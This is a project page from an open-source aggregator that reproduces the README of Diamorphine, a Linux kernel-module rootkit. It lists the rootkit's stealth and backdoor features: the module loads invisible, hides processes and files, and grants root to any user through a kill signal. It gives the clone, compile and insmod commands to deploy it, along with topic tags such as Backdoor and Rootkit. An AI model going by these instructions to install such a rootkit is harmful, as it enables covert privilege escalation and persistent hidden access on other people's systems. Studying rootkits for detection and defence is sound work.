Awesome Open Source
Awesome Open Source

Diamorphine

Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64

Features

  • When loaded, the module starts invisible;

  • Hide/unhide any process by sending a signal 31;

  • Sending a signal 63(to any pid) makes the module become (in)visible;

  • Sending a signal 64(to any pid) makes the given user become root;

  • Files or directories starting with the MAGIC_PREFIX become invisible;

  • Source: https://awesomeopensource.com/project/m0nad/Diamorphine

Install

Verify if the kernel is 2.6.x/3.x/4.x/5.x

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine

Compile

make

Load the module(as root)

insmod diamorphine.ko

Uninstall

The module starts invisible, to remove you need to make it visible

kill -63 0

Then remove the module(as root)

rmmod diamorphine

References

Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit

Linux Device Drivers http://lwn.net/Kernel/LDD3/

LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

Memset's blog http://memset.wordpress.com/

Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html

WRITING A SIMPLE ROOTKIT FOR LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

Linux Cross Reference http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: New Methods for Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/


Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
C (274,766
Linux (17,065
Security (9,009
Hacking (2,462
Kernel (1,837
Security Tools (1,752
Pentesting (1,386
Malware (999
Hacking Tool (923
Linux Kernel (677
Pentest (646
Redteam (560
Security Audit (400
Backdoor (308
Kernel Module (199
Redteaming (155
Rootkit (113
Stealth (47
Advanced Persistent Threat (13
Lkm Rootkit (5
Related Projects